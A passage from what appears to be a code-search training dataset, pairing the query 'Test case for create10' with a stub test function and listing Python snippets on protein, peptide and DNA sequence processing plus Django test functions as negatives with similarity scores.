experiment.inputs_1d_placeholder: inputs_1d,\n experiment.residue_index_placeholder: residue_index,\n experiment.inputs_2d_placeholder: inputs_2d,\n experiment.crop_placeholder: crop_limits,\n })\n # Crop out the \"live\" region of the probs.\n prob_patch = output_results['probs'][\n 0, prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n weight_patch = prob_weights[prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n patch = {'prob': prob_patch, 'weight': weight_patch}\n\n if 'softmax_probs' in output_results:\n patch['softmax'] = output_results['softmax_probs'][\n 0, prepad_y:crop_size_y - postpad_y,\n prepad_x:crop_size_x - postpad_x]\n if 'secstruct_probs' in output_results:\n patch['ss_x'] = output_results['secstruct_probs'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['ss_y'] = output_results['secstruct_probs'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n if 'torsion_probs' in output_results:\n patch['torsions_x'] = output_results['torsion_probs'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['torsions_y'] = output_results['torsion_probs'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n if 'asa_output' in output_results:\n patch['asa_x'] = output_results['asa_output'][\n 0, prepad_x:crop_size_x - postpad_x]\n patch['asa_y'] = output_results['asa_output'][\n 0, crop_size_x + prepad_y:crop_size_x + crop_size_y - postpad_y]\n return patch",
"def create_decoy_peprec(peprec, spec_id_prefix='decoy_', keep_cterm_aa=True, remove_redundancy=True, move_mods=True):\n\n def move_mods(row):\n mods = row['modifications']\n if type(mods) == str:\n if not mods == '-':\n mods = mods.split('|')\n mods = sorted(zip([int(p) if (p == '-1' or p == '0')\n else len(row['peptide']) - int(p)\n for p in mods[::2]\n ], mods[1::2]))\n mods = '|'.join(['|'.join([str(x) for x in mod]) for mod in mods])\n row['modifications'] = mods\n return row\n\n peprec_decoy = peprec.copy()\n peprec_decoy['spec_id'] = spec_id_prefix + peprec_decoy['spec_id'].astype(str)\n\n if keep_cterm_aa:\n peprec_decoy['peptide'] = peprec_decoy['peptide'].apply(lambda pep: pep[-2::-1] + pep[-1])\n else:\n peprec_decoy['peptide'] = peprec_decoy['peptide'].apply(lambda pep: pep[-1::-1])\n\n if remove_redundancy:\n peprec_decoy = peprec_decoy[~peprec_decoy['peptide'].isin(peprec['peptide'])]\n\n if 'protein_list' in peprec_decoy.columns:\n peprec_decoy['protein_list'] = 'decoy'\n\n if move_mods:\n peprec_decoy = peprec_decoy.apply(move_mods, axis=1)\n\n return peprec_decoy",
"def _apply_termini_modifications(graph, modifications):\n terminal_nodes = _find_terminal_nodes(graph)\n for modification in modifications:\n seq_ID, resname = modification.split(':')\n idx_nodes = find_atoms(graph, \"seqid\", int(seq_ID))\n for node in idx_nodes:\n if node in terminal_nodes:\n graph.nodes[node][\"resname\"] = resname",
"def MAP(cpts, obs, terms):\r\n\r\n # a list to store the computed probabilities\r\n all_sums = []\r\n # initialize all terms to false\r\n for value in range(len(terms)):\r\n terms[value] = [terms[value], '0']\r\n search_array = terms + obs\r\n # if all terms are being watched, just call MPE\r\n if len(search_array) == len(cpts):\r\n return MPE(cpts, obs)\r\n # we need to know what terms we aren't interested in so we start with \r\n # or terms and observations and note the variables that appear in CPT but\r\n # not in those\r\n dont_count = []\r\n for var in cpts:\r\n if [var[0], '0'] not in search_array and [var[0], '1'] not in search_array:\r\n dont_count.append(var[0])\r\n terms.append([var[0],'1'])\r\n # sort the terms to ensure correct ordering\r\n terms.sort()\r\n # creates a list of all possible bit strings\r\n # just an easy way to create all possible truth assignments\r\n seq = [\"\".join(seq) for seq in itertools.product(\"01\", repeat=len(terms))]\r\n # loop through all possible truth assignments\r\n for j in range(len(seq)):\r\n # we initialize at probability = 100%\r\n chance = 1\r\n # assign the truth values\r\n for k in range(len(seq[j])):\r\n terms[k][1] = seq[j][k]\r\n # this computes the probability using the chaining rule\r\n for i in range(len(terms)):\r\n new_terms = terms[:-i-1] + obs\r\n new_terms.sort()\r\n chance *= probability(cpts,terms[-i-1], new_terms)\r\n # add the probabilities to our list\r\n all_sums.append(chance)\r\n combine = []\r\n # note all variables which weren't in obs or Vs\r\n for i in dont_count:\r\n combine.append(terms.index([i,'1']))\r\n # this will store the final probabilities\r\n final_array = [0] * len(seq)\r\n # another complicated looking loop, it just serves to combine probabilities\r\n # for example, if we have a CPT with x_1, x_2, x_3, x_4 and we observe \r\n # x_1 to be true and have Vs = [x_3, x_4] then we need to combine the \r\n # probabilities that are the same except for x_2 = true vs false\r\n for loc in combine:\r\n for sequence in range(len(seq)):\r\n for alt_sequence in range(sequence+1,len(seq)):\r\n if (seq[sequence][:loc] + seq[sequence][loc+1:]) == (seq[alt_sequence][:loc] + seq[alt_sequence][loc+1:]):\r\n final_array[sequence] = all_sums[sequence] + all_sums[alt_sequence]\r\n\r\n # get the truth assignment for the highest probability\r\n location = seq[final_array.index(max(final_array))]\r\n truth_assignment = []\r\n # place the truth assignment in a more readable fashion\r\n for value in range(len(terms)):\r\n if terms[value] in search_array:\r\n if location[value] == '0':\r\n truth_assignment.append(terms[value][0]+ ' = False')\r\n else:\r\n truth_assignment.append(terms[value][0]+ ' = True')\r\n return (truth_assignment)",
"def convert_pmod(pmod):\n\n if pmod.args[0].value in belspec[\"bel1_migration\"][\"protein_modifications\"]:\n pmod.args[0].value = belspec[\"bel1_migration\"][\"protein_modifications\"][pmod.args[0].value]\n\n return pmod",
"def calculate_rxn_syst_pI(sequence, rxn_syst, cutoff_pi):\n modifications = define_seq_modifications()\n seq_obj = ProteinAnalysis(sequence)\n pi = seq_obj.isoelectric_point()\n modifier = '0'\n if pi < cutoff_pi:\n category = '0'\n else:\n category = '1'\n\n if category == '0':\n rxn_syst.seed_MOF = True\n rxn_syst.pI = pi\n\n # if the category is 1 - i.e. pi > cutoff\n # then we test modification\n elif category == '1':\n # report unmodified pI if modification isn't successful\n rxn_syst.pI = pi\n modifier = '1'\n # get modified pI\n seq = sequence\n # replace target amino acid residue\n # with replacement amino acid residue\n # one letter codes\n targ = convert_to_one_letter_code_sing(\n modifications[modifier]['target_res']\n )\n replacement = convert_to_one_letter_code_sing(\n modifications[modifier]['replace_res']\n )\n mod_seq = ''.join(seq).replace(targ, replacement)\n seq_obj = ProteinAnalysis(mod_seq)\n pi = seq_obj.isoelectric_point()\n if pi < cutoff_pi:\n category = '0'\n else:\n category = '1'\n\n if category == '0':\n rxn_syst.seed_MOF = True\n rxn_syst.req_mod = modifier\n rxn_syst.pI = pi\n else:\n rxn_syst.seed_MOF = False\n\n return rxn_syst",
"def genPrimerPairs_3Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 3\\' extension half-asstemers')\n\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[8:10]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_L10 = forwPrimer5_3[10:]\n print(f\"Last 10 Nucleotides of forward primer: {forwPrimer_L10}\")\n\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_L10[::-1])):\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n\n \"\"\"First 10 Nuc of rev primer must be identical to last 10 Nuc of forward Primer\"\"\"\n revPrimer5_3 = forwPrimer_L10 + revPrimer_L10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3",
"def editfeature(dna, key_attribute=\"all\", query=\".+\", source=None, start=0, end=None, strand=2, target_attribute=None, operation=None, new_copy=True, \n product=None, process_name=None, process_description=None, pn=None, pd=None, quinable=None, **kwargs):\n kwargs.setdefault(\"_sourcefile\", None) \n kwargs.setdefault(\"process_id\", None)\n kwargs.setdefault(\"original_ids\", []) \n _sourcefile = kwargs[\"_sourcefile\"] \n process_id = kwargs[\"process_id\"] \n original_ids = kwargs[\"original_ids\"]\n\n project = None\n project = project if product is None else product\n process_name = pn if process_name is None else process_name\n process_description = pd if process_description is None else process_description\n if quinable is None:\n if target_attribute == \"sequence\":\n quinable = True\n else:\n quinable = False\n\n if new_copy == False or quinable == False:\n pass \n else:\n original_id = dna._product_id\n dna = copy.deepcopy(dna) \n\n end = len(dna.seq) if end is None else end\n feature_list = dna.dnafeatures if source is None else source\n \n new_source = [] \n if start > end:\n for feat in feature_list:\n if start <= feat.start <= len(dna.seq) and 0 <= feat.end <= end and (feat.strand == strand or strand == 2): \n new_source.append(feat) \n else:\n for feat in feature_list:\n if start <= feat.start <= end and (feat.strand == strand or strand == 2): \n new_source.append(feat) \n\n feat_list = _search(dna, new_source, query, attribute=key_attribute) \n if operation is None or target_attribute is None:\n return feat_list\n \n elif operation.func.__name__ in (\"_createattribute\", \"_removeattribute\", \"_replaceattribute\"):\n for i, feat in enumerate(feat_list):\n feat._tmpid = i \n \n dna = operation(dna=dna, feat_list=feat_list, target_attribute=target_attribute)\n largs = [] \n for item in operation.keywords.items():\n item = list(item) \n if type(item[1]) is str:\n item[1] = repr(item[1]) \n #\"'\" + item[1] + \"'\"\n else:\n item[1] = str(item[1]) \n largs.append(\"=\".join(item)) \n command = operation.func.__name__[1:] + \"(\" + \",\".join(largs) + \")\"\n \n if type(query) == dna.seq.__class__:\n if query.parental_class == \"DNAFeature\":\n qkey = left_origin.qkey\n for qindex, qfeat in enumerate(dna.__class__.queried_features_dict[qkey]):\n if qfeat._second_id == query.parental_id:\n break\n if type(query.item) == int:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].{}[{}]\".format(qkey, qindex, \"seq\" , query.item)\n elif type(query.item) == slice:\n sl_start = query.item.start\n sl_stop = query.item.stop \n sl_step = query.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}]\".format(qkey, qindex, sl_start, sl_stop)\n else:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq[{}:{}:{}]\".format(qkey, qindex, sl_start, sl_stop, sl_step)\n else:\n fquery = \"QUEEN.queried_features_dict['{}'][{}].seq\".format(qkey, qindex)\n history_features.append(query.parent.subject._history_feature) \n \n elif query.parental_class == \"QUEEN\": \n parental_id = query.parental_id \n if query.name != None: \n if \"printsequence\" in query.name:\n if len(query.name.split(\"_\")) == 2: \n seqname = \"QUEEN.dna_dict['{}'].printsequence(strand={})\".format(parental_id, query.name.split(\"_\")[-1]) \n else:\n seqname = \"QUEEN.dna_dict['{}'].printsequence(start={}, end={}, strand={})\".format(parental_id, *query.name.split(\"_\")[1:])\n elif query.name == \"rcseq\":\n seqname = \"QUEEN.dna_dict['{}'].rcseq\".format(parental_id) \n else:\n seqname = \"QUEEN.dna_dict['{}'].seq\".format(parental_id)\n if type(query.item) == int:\n args.append(\"QUEEN.dna_dict['{}'].seq[{}]\".format(parental_id, query.item))\n elif type(query.item) == slice:\n sl_start = query.item.start\n sl_stop = query.item.stop \n sl_step = query.item.step\n sl_start = \"\" if sl_start is None else sl_start\n sl_stop = \"\" if sl_stop is None else sl_stop\n if sl_step == 1 or sl_step == None:\n fquery = \"{}[{}:{}]\".format(seqname, sl_start, sl_stop)\n else:\n fquery = \"{}[{}:{}:{}]\".format(seqname, sl_start, sl_stop, sl_step)\n else:\n fquery = \"{}\".format(seqname)\n history_features.append(query.parent._history_feature) \n \n elif query.parental_class == \"Cutsite\":\n if query.parent.name not in cs.defaultkeys:\n cs.new_cutsites.append((query.parent.name, query.parent.cutsite)) \n fquery = \"cs.lib['{}'].{}\".format(qorigin.parent.name, qorigin.name) \n else:\n fquery = \"{}\".format(repr(query)) \n\n else:\n fquery = \"{}\".format(repr(query)) \n \n if source is not None:\n qkeys = set([]) \n for feat in source:\n if \"_qkey\" in feat.__dict__:\n qkeys.add(feat._qkey)\n \n if len(set(qkeys)) == 1:\n source = \"QUEEN.queried_features_dict['{}']\".format(list(qkeys)[0])\n else:\n pass \n\n if project is None:\n pass\n else:\n dna._unique_id = project\n \n if new_copy == True and quinable == True:\n project = \"\" #if project is None else \", project='\" + project + \"'\"\n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n dna._product_id = dna._unique_id if product is None else product \n if start == 0 and end == len(dna.seq):\n args = [key_attribute, fquery, source, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 5 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"QUEEN.dna_dict['{}'] = editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._product_id, original_id, *args, project, fproduct, process_name, process_description) \n \n else:\n args = [key_attribute, fquery, source, start, end, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 7 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"QUEEN.dna_dict['{}'] = editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, start={}, end={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._product_id, original_id, *args, project, fproduct, project, process_name, process_description) \n \n process_id, original_ids = make_processid(dna, building_history, process_id, original_ids)\n add_history(dna, [building_history, \"key_attribute: {}; query: {}; start: {}; end: {}; strand: {}; target_attribute: {}; operation: {}\".format(key_attribute, fquery, start, end, strand, target_attribute, command), process_id, \",\".join([process_id] + original_ids)], _sourcefile)\n dna._check_uniqueness()\n if product is None:\n pass \n else:\n dna._product_id = product \n match = re.fullmatch(\"(.+)\\[(.+)\\]\", product)\n if match:\n if match.group(2).isdecimal() == True:\n dna.__class__._namespace[match.group(1)][int(match.group(2))] = dna\n else:\n dna.__class__._namespace[match.group(1)][match.group(2)] = dna\n else: \n dna.__class__._namespace[product] = dna\n\n elif new_copy == False or quinable == False:\n project = \"\" if project is None else \", project='\" + project + \"'\"\n fproduct = \"\" if product is None else \", product='\" + product + \"'\"\n process_name = \"\" if process_name is None else \", process_name='\" + process_name + \"'\"\n process_description = \"\" if process_description is None else \", process_description='\" + process_description + \"'\" \n args = [key_attribute, fquery, source, start, end, strand, target_attribute, command, new_copy]\n for i in range(len(args)):\n if type(args[i]) is str and i != 7 and i != 1:\n args[i] = \"'\" + args[i] + \"'\" \n building_history = \"editfeature(QUEEN.dna_dict['{}'], key_attribute={}, query={}, source={}, start={}, end={}, strand={}, target_attribute={}, operation={}, new_copy={}{}{}{}{})\".format(dna._unique_id, *args, project, fproduct, process_name, process_description)\n \n else:\n raise ValueError(\"'operation' can take only one of 'createattribute,' 'removeattribute,' and 'replaceattribute.'\")\n\n if new_copy == True:\n return dna",
"def getCodonSeqs(self):\r\n combinations = list(self.codonTable[aa] for aa in self.peptide) # creates a list of possible codons based on AA\r\n self.allPepSeqs = list(''.join(codon) for codon in itertools.product(*combinations)) # creates list of peptides\r\n return",
"def delta_prob_raw(variants, tx, clf1, clf2, model='cterm', is_sum=True):\n # fetch c-terminal sequence\n term_seq = [] ; vars_considered = []\n for v in variants:\n if v.mutant_protein_sequence:\n if model=='cterm' and type(v) in utils.indels+utils.nmd_sub_vars:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif type(v) in utils.base_substitutions:\n if model=='cterm' and v.aa_mutation_start_offset>(len(v.transcript.protein_sequence) - 23):\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n elif model=='nterm' and v.aa_mutation_start_offset<=24:\n term_seq.append(utils.fetch_seq(v.mutant_protein_sequence, model=model))\n if not is_sum: vars_considered.append(v)\n\n # return None if no variants\n if not term_seq:\n if is_sum: return 0\n else: return [], [], []\n # return None if U in protein sequence\n if 'U' in utils.fetch_seq(tx.protein_sequence, model=model):\n if is_sum: return 0\n else: return [], [], []\n\n # construct dataframe\n result_df = pd.DataFrame({'seq': term_seq})\n\n # create feature matrix\n X = compute_feature_matrix(result_df['seq'], 6, dinuc=True, model=model)\n X2 = compute_feature_matrix(result_df['seq'], 0, dinuc=False, model=model)\n\n # predict scores\n result_df['prob'] = clf1.predict_proba(X)[:, 0]\n\n # adjust for baseline score\n wt_seq = utils.fetch_seq(tx.protein_sequence, model=model)\n wt_df = pd.DataFrame({'seq': [wt_seq]})\n # create feature matrix\n X = compute_feature_matrix(wt_df['seq'], 6, dinuc=True, model=model)\n wt_df['prob'] = clf1.predict_proba(X)[:, 0]\n baseline = wt_df['prob'].iloc[0]\n\n # add up scores\n tmp = result_df['prob'] - baseline\n if is_sum:\n prob_sum = tmp.sum()\n return prob_sum\n else:\n return vars_considered, tmp, result_df['prob']",
"def protein_from_orfs(dna):\n rna = dna.replace(\"T\", \"U\")\n reverse_complement_rna = complement_strand(dna).replace(\"T\", \"U\")\n\n candidate_proteins = set()\n\n for strand in [rna, reverse_complement_rna]:\n for index in [m.start() for m in re.finditer('AUG', strand)]:\n codons_list = codons(strand[index:])\n protein = \"\"\n\n if any(rna_codon_dict[codon] == \"Stop\" for codon in codons_list):\n for codon in codons_list:\n symbol = rna_codon_dict[codon]\n\n if symbol != \"Stop\":\n protein += symbol\n else:\n candidate_proteins.add(protein)\n break\n\n return candidate_proteins",
"def molpbcs(strucC, cov_nblist, cov_nbindx ,verbose = False, debug = False ):\n \n debug2 = False\n latticevec = strucC.getLatVec()\n\n n_dim = 3\n\n if( debug ):\n print \"latticevec\",latticevec\n F = open(\"shift.rec\",\"w\")\n \n for mol_i in range( 1,strucC.ptclC.n_molecules()+1) :\n\n if( verbose ):\n print \" Checking molecule %d of %d \"%(mol_i,strucC.ptclC.n_molecules())\n\n searchD = {'chain':mol_i}\n mol_list = strucC.ptclC.getParticlesWithTags(searchD)\n\n if( len( mol_list) > 0 ):\n ptclObj = strucC.ptclC[1]\n r_o = ptclObj.position\n pid_o = 1\n\n part_shifted = [False]*len(strucC.ptclC)\n\n r_mol_mass = np.zeros(n_dim)\n shift = np.zeros(n_dim)\n total_mass = 0.0 \n\n # shift all atoms to be conected \n \n for pid_i in sorted(mol_list):\n ptclObj_i = strucC.ptclC[pid_i]\n a_mass_i = ptclObj_i.mass\n r_i = ptclObj_i.position\n\n r_io = np.array(r_o) - np.array(r_i)\n\n # sum center of mass\n total_mass += a_mass_i\n\n\n \n shifted = False \n for dim in range(n_dim):\n shift_dim = round( r_io[dim]/ latticevec[dim][dim] )\n r_i[dim] = r_i[dim] + latticevec[dim][dim] * shift_dim\n if( shift_dim != 0 ):\n shifted = True \n \n r_mol_mass[dim] = r_mol_mass[dim] + a_mass_i*r_i[dim] \n \n\n if( debug and shifted ):\n shift_line = \"\\n %d - %d r = %f %f %f dr = %f %f %f \"%(pid_i,pid_o,ptclObj_i.position[0],ptclObj_i.position[1],ptclObj_i.position[2],r_io[0],r_io[1],r_io[2])\n F.write(shift_line)\n \n ptclObj_i.position = r_i\n r_o = r_i\n pid_o = pid_i\n\n # Shift molecular center of mass into box \n for dim in range(n_dim):\n cent_mass_i = r_mol_mass[dim] /total_mass\n shift[dim] = latticevec[dim][dim] * round( cent_mass_i / latticevec[dim][dim] )\n\n \n for pid_i in sorted(mol_list):\n ptclObj_i = strucC.ptclC[pid_i]\n for dim in range(n_dim):\n ptclObj_i.position[dim] = ptclObj_i.position[dim] - shift[dim] \n \n \n\n if( debug ):\n F.close()",
"def sequence_edits_as_features(self, feature_type=\"misc_feature\"):\n segments = sequences_differences_segments(\n self.sequence, self.sequence_before\n )\n return [\n Location(start, end).to_biopython_feature(\n label=\"%s=>%s\"\n % (self.sequence_before[start:end], self.sequence[start:end]),\n is_edit=\"true\",\n ApEinfo_fwdcolor=\"#ff0000\",\n color=\"#ff0000\",\n )\n for start, end in segments\n ]"
] |
[
"0.54200894",
"0.53885895",
"0.5254579",
"0.51519775",
"0.5098741",
"0.5096374",
"0.5024336",
"0.5018911",
"0.49383074",
"0.49299872",
"0.49182498",
"0.48595127",
"0.48558405",
"0.48059258",
"0.48001656",
"0.47948107",
"0.47804606",
"0.47686902",
"0.47572595",
"0.4755383",
"0.47546798",
"0.47306255",
"0.47266603",
"0.47222513",
"0.47107854",
"0.46885902",
"0.46814373",
"0.4671642",
"0.4639479",
"0.46368006"
] |
0.6112871
|
0
|
Test case for create10
|
def test_create10(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_create(self):\n pass",
"def test_create_run(self):\n pass",
"def test_create_unexpected_problem(self):\n pass",
"def create():",
"def create():",
"def create():\n pass",
"def test_0_0_create(self):\n\n self.assertTrue(self.b1)",
"def test_create_record(self):\n pass",
"def test_create_occurrence(self):\n pass",
"def create(self):",
"def create(*args):",
"def test_create(self):\n self.assertEqual(Routine.objects.count(), 2)\n payload = {\n 'name': 'Monday routine',\n }\n self.client.post('/routines/', data=payload)\n self.assertEqual(Routine.objects.count(), 3)",
"def create(self):\n ...",
"def test_create_valid_int(self):\n storage = FileStorage()\n tests = [9, 12, 10000]\n expected = [9, 12, 10000]\n\n for i in range(len(tests)):\n self.remove_all()\n with patch('sys.stdout', new=StringIO()) as f:\n self.console.onecmd(\n 'create BaseModel test_var={}'.format(tests[i]))\n attributes = list(storage.all().values())\n actual = attributes[0].test_var\n self.assertEqual(expected[i], actual)\n self.assertEqual(int, type(actual))",
"def test_create_invalid_int(self):\n storage = FileStorage()\n tests = ['9.a', '90ab10', '90.b1']\n\n for test in tests:\n self.remove_all()\n with patch('sys.stdout', new=StringIO()) as f:\n self.console.onecmd(\n 'create BaseModel test_var={}'.format(test))\n attributes = list(storage.all().values())\n self.assertFalse('test_var' in attributes[0].to_dict())",
"def test_new(self):",
"def test_new(self):",
"def test_create(self):\n\t\tself.obj.save()\n\t\tself.assertEqual(1, self.obj.id)",
"def test_create_template(self):\n m_size = 10\n data = ecn.IDData(m_size)\n self.assertEqual(np.shape(data.ID_MATRIX), (m_size, m_size))\n self.assertEqual(sum(sum(data.ID_MATRIX)), m_size)\n self.assertTrue((sum(data.ID_MATRIX) == np.ones(m_size)).all())\n print('Finished testing template\\n')",
"def test_createUser_single(self):\n #TODO: this and other tests",
"def test_create(self):\n B._Base__nb_objects = 0\n\n d = {'id': 5, 'width': 3, 'height': 7, 'x': 2, 'y': 1}\n r1 = Rectangle.create(**d)\n self.assertEqual(r1.to_dictionary(), d)\n self.assertEqual(B._Base__nb_objects, 1)\n\n s2 = Square(5)\n d4 = s2.to_dictionary()\n s5 = Square.create(**d4)\n self.assertEqual(s5.to_dictionary(), d4)\n self.assertEqual(B._Base__nb_objects, 3)",
"def test_create_scenario1(self):\n pass",
"def test_create_system_entire(self):\n pass",
"def test_create_activity_occurrence(self):\n pass",
"def generate_test_data(self, obj_name, number_to_create, **fields):\n objs = []\n\n for i in range(int(number_to_create)):\n formatted_fields = {\n name: format_str(value, {\"number\": i}) for name, value in fields.items()\n }\n newobj = self._salesforce_generate_object(obj_name, **formatted_fields)\n objs.append(newobj)\n\n return objs",
"def test_func(x):\n for i in range(32):\n handle = self.model_manager.create(name='%s-%s' % (x, i))\n self.assertTrue(\n handle in [m.handle for m in self.model_manager.models()])\n self.model_manager.delete(handle)\n self.assertTrue(\n handle not in\n [m.handle for m in self.model_manager.models()])\n return True",
"def create(self):\n pass",
"def create(self):\n pass",
"def create(self):\n pass",
"def test_create_template_subsciption(self):\n pass"
] |
[
"0.73249733",
"0.7319273",
"0.69483125",
"0.6945639",
"0.6945639",
"0.6840163",
"0.6767891",
"0.67604375",
"0.669465",
"0.66335654",
"0.65506196",
"0.64774275",
"0.6434738",
"0.6417117",
"0.6386177",
"0.6376453",
"0.6376453",
"0.627494",
"0.6224595",
"0.6221611",
"0.6197326",
"0.61541563",
"0.6153361",
"0.61518544",
"0.6145056",
"0.61326486",
"0.61218643",
"0.61218643",
"0.61218643",
"0.6121304"
] |
0.8980569
|
0
|
Test case for create_bulk_academic
|
def test_create_bulk_academic(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_Student_bulk(self):\n school_ids = self.create_School(2,20)\n url = '/students'\n for i in range(10):\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 10)\n self.assertEqual(response.data['results'][0]['first_name'], 'Poompatai')\n self.assertEqual(response.data['results'][0]['last_name'], 'Puntitpong')\n self.assertEqual(response.data['results'][0]['age'], 20)\n self.assertEqual(response.data['results'][0]['nationality'], 'Thailand')\n self.assertEqual(response.data['results'][0]['school'], school_ids[0])",
"def test_otoroshi_controllers_adminapi_tcp_service_api_controller_bulk_create_action(self):\n pass",
"def test_bulk_create(self):\n urls = [reverse('api:user-list')]\n data = [\n {\n \"username\": \"newuser1\",\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n },\n {\n \"username\": \"newuser2\",\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n },\n ]\n access = {\n \"forbidden\": [self.admin_client, self.anonymous_client, self.readonly_client, self.custodian_1_client],\n \"allowed\": []\n }\n for client in access['forbidden']:\n for url in urls:\n self.assertIn(\n client.post(url, data, format='json').status_code,\n [status.HTTP_400_BAD_REQUEST, status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN]\n )\n\n for client in access['allowed']:\n for url in urls:\n self.assertEqual(\n client.post(url, data, format='json').status_code,\n status.HTTP_201_CREATED\n )",
"def test_create_Student_full(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n for i in range(20):\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data['school'][0].code, 'invalid')\n self.assertEqual(str(response.data['school'][0]), 'School Triamudomsuksa already has maximum number of students')",
"def test_get_people_list(self):\n person_1 = Person(\n first_name='Emilia',\n last_name='Clarke',\n aliases='Emi'\n )\n person_2 = Person(\n first_name='Peter',\n last_name='Dinklage',\n )\n person_3 = Person(\n first_name='Thomas',\n last_name='McCarthy',\n aliases='Thom'\n )\n\n Person.objects.bulk_create([person_1, person_2, person_3])\n\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data.get('count'), Person.objects.count())",
"def test_batch_create_occurrences(self):\n pass",
"def bulk_create_samples(request):\n sample_names = request.data['names']\n library_uuid = request.data['library']\n library = SampleGroup.objects.get(pk=library_uuid)\n try:\n membership_queryset = request.user.organization_set.filter(pk=library.organization.pk)\n authorized = membership_queryset.exists()\n except AttributeError: # occurs if user is not logged in\n authorized = False\n if not authorized:\n raise PermissionDenied(_('Insufficient permissions to get group manifest.'))\n uuids = []\n for name in sample_names:\n sample = library.create_sample(name=name)\n uuids.append(sample.uuid)\n return Response({'uuids': uuids}, status=201)",
"def test_bulk_group(self):\n for fn, sep in [(self.filename_actg, '\\t'),\n (self.filename_actg_csv, ';')]:\n file_path_ag = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n fn)\n data = {\n 'bulk_upload' : open(file_path_ag, 'rb'),\n }\n\n existing_ags = ActivityGroup.objects.filter(keyflow=self.kic)\n existing_codes = list(existing_ags.values_list('code', flat=True))\n\n encoding = 'utf8'\n df_file_ags = pd.read_csv(file_path_ag, sep=sep)\n df_file_ags = df_file_ags.rename(\n columns={c: c.lower() for c in df_file_ags.columns})\n file_codes = df_file_ags['code']\n new_codes = [c for c in file_codes if c not in existing_codes]\n\n res = self.client.post(self.ag_url, data)\n res_json = res.json()\n assert res.status_code == status.HTTP_201_CREATED\n assert res_json['count'] == len(file_codes)\n assert len(res_json['created']) == len(new_codes)\n\n # assert that the number of activities matches\n all_ag = ActivityGroup.objects.filter(keyflow_id=self.kic.id)\n assert len(all_ag) == len(existing_codes) + len(new_codes)\n\n # assert that the Name matches in all values\n for row in df_file_ags.itertuples(index=False):\n ag = ActivityGroup.objects.get(keyflow=self.keyflow,\n code=row.code)\n assert ag.name == row.name",
"def test_perform_create(self):\n\n response = self.client.post(reverse('action-list'), data=self.data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data['name'], self.data['name'])\n self.assertTrue(len(response.data['institution']), self.data['institution'])",
